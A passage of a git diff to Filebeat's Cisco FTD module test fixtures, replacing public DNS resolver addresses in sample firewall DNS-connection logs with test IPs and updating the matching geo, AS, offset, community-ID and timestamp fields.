-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1513,9 +1504,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 9010,
+        "log.offset": 9067,
         "network.application": "dns client",
-        "network.community_id": "1:f5P/ntfU9KchCtCfWHT0mYDOHOw=",
+        "network.community_id": "1:6V/s46Po6wnn5ES7o/vBqmwKUOA=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1531,8 +1522,8 @@
             "siem-ftd"
         ],
         "related.ip": [
-            "10.0.1.20",
-            "9.9.9.9"
+            "1.128.3.4",
+            "10.0.1.20"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1568,7 +1559,7 @@
         "cisco.ftd.security.dns_record_type": "Server Selection",
         "cisco.ftd.security.dns_response_type": "Non-Existent Domain",
         "cisco.ftd.security.dns_ttl": "946",
-        "cisco.ftd.security.dst_ip": "9.9.9.9",
+        "cisco.ftd.security.dst_ip": "1.128.3.4",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1585,16 +1576,11 @@
         "cisco.ftd.security.src_port": "35998",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "9.9.9.9",
-        "destination.as.number": 19281,
-        "destination.as.organization.name": "Quad9",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
         "destination.bytes": 162,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
-        "destination.ip": "9.9.9.9",
+        "destination.ip": "1.128.3.4",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "_http._tcp.security.ubuntu.com",
@@ -1610,7 +1596,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1624,9 +1610,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 9683,
+        "log.offset": 9742,
         "network.application": "dns client",
-        "network.community_id": "1:wrAm7MmrJHlBQ+ikcQmSwf2JnJM=",
+        "network.community_id": "1:F1VZPAzgUyhFzHXdZCyLebsB4JY=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1642,8 +1628,8 @@
             "siem-ftd"
         ],
         "related.ip": [
-            "10.0.1.20",
-            "9.9.9.9"
+            "1.128.3.4",
+            "10.0.1.20"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1679,7 +1665,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "mail exchange",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1697,16 +1683,17 @@
         "cisco.ftd.security.src_port": "55105",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 199,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -1722,7 +1709,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1736,9 +1723,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 10403,
+        "log.offset": 10464,
         "network.application": "dns client",
-        "network.community_id": "1:rjxS8IH4jqdHiflcG+1txqEFP1M=",
+        "network.community_id": "1:udDTvAepVn3p8B+5mKdI4G/Ijb0=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1755,7 +1742,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1790,7 +1777,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "marks the start of a zone of authority",
         "cisco.ftd.security.dns_ttl": "899",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1807,16 +1794,17 @@
         "cisco.ftd.security.src_port": "47260",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -1832,7 +1820,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1846,9 +1834,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 11118,
+        "log.offset": 11184,
         "network.application": "dns client",
-        "network.community_id": "1:0YJqKZXX7VN9W1Gx6txd8TFELHM=",
+        "network.community_id": "1:t64M0Z/m2pBWy+a226Z/H+Vnrjc=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1865,7 +1853,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1900,7 +1888,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "the canonical name for an alias",
         "cisco.ftd.security.dns_ttl": "899",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1917,16 +1905,17 @@
         "cisco.ftd.security.src_port": "53033",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -1942,7 +1931,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1956,9 +1945,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 11801,
+        "log.offset": 11872,
         "network.application": "dns client",
-        "network.community_id": "1:nTPeg7DUgB3rjeFwl+cm5VHEdXQ=",
+        "network.community_id": "1:f+1BLN4exLJYoDCfuD6+el4NNZc=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1975,7 +1964,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -2010,7 +1999,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "an authoritative name server",
         "cisco.ftd.security.dns_ttl": "21599",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -2027,16 +2016,17 @@
         "cisco.ftd.security.src_port": "57141",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 221,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -2052,7 +2042,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -2066,9 +2056,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 12477,
+        "log.offset": 12553,
         "network.application": "dns client",
-        "network.community_id": "1:R1FcZHFFvO0mHFfeVXH/CwTGCmU=",
+        "network.community_id": "1:lQqpyFbf8OB4k/v/Xp3qTDb5NiQ=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -2085,7 +2075,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -2119,7 +2109,7 @@
         "cisco.ftd.security.connection_duration": "0",
         "cisco.ftd.security.dns_record_type": "a domain name pointer",
         "cisco.ftd.security.dns_ttl": "59",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -2136,16 +2126,17 @@
         "cisco.ftd.security.src_port": "46093",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 131,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.type": "PTR",
@@ -2160,7 +2151,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -2174,9 +2165,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 13152,
+        "log.offset": 13233,
         "network.application": "dns client",
-        "network.community_id": "1:k5kQaEfpetJ7SxFkG7Ytzzz5ik0=",
+        "network.community_id": "1:J7DpSxMrG7llgbHfyoi5VniCjj8=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -2193,7 +2184,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -2229,7 +2220,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "text strings",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -2247,16 +2238,17 @@
         "cisco.ftd.security.src_port": "58082",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 722,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -2272,7 +2264,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -2286,9 +2278,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 13795,
+        "log.offset": 13881,
         "network.application": "dns client",
-        "network.community_id": "1:jVTdIEwjG0Eb77jGrcDygrNq9jg=",
+        "network.community_id": "1:7tN8tGLiJNoFT89lpvR+QyNOZBM=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -2305,7 +2297,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json
index 4d9798688477..5d1987b7ec6b 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json
@@ -100,7 +100,7 @@
         ]
     },
     {
-        "@timestamp": "2014-04-15T09:34:34.000-04:00",
+        "@timestamp": "2014-04-15T11:34:34.000-02:00",
         "cisco.ftd.destination_interface": "outside",
         "cisco.ftd.message_id": "106100",
         "cisco.ftd.rule_name": "acl_in",
@@ -1926,7 +1926,7 @@
         ]
     },
     {
-        "@timestamp": "2018-04-15T09:34:34.000-04:00",
+        "@timestamp": "2018-04-15T11:34:34.000-02:00",
         "cisco.ftd.destination_interface": "outside",
         "cisco.ftd.message_id": "106100",
         "cisco.ftd.rule_name": "acl_in",
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log
index c81a41dfb1f7..a82fe965d197 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log
@@ -1,7 +1,7 @@
 2019-08-15T16:03:31Z firepower  %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
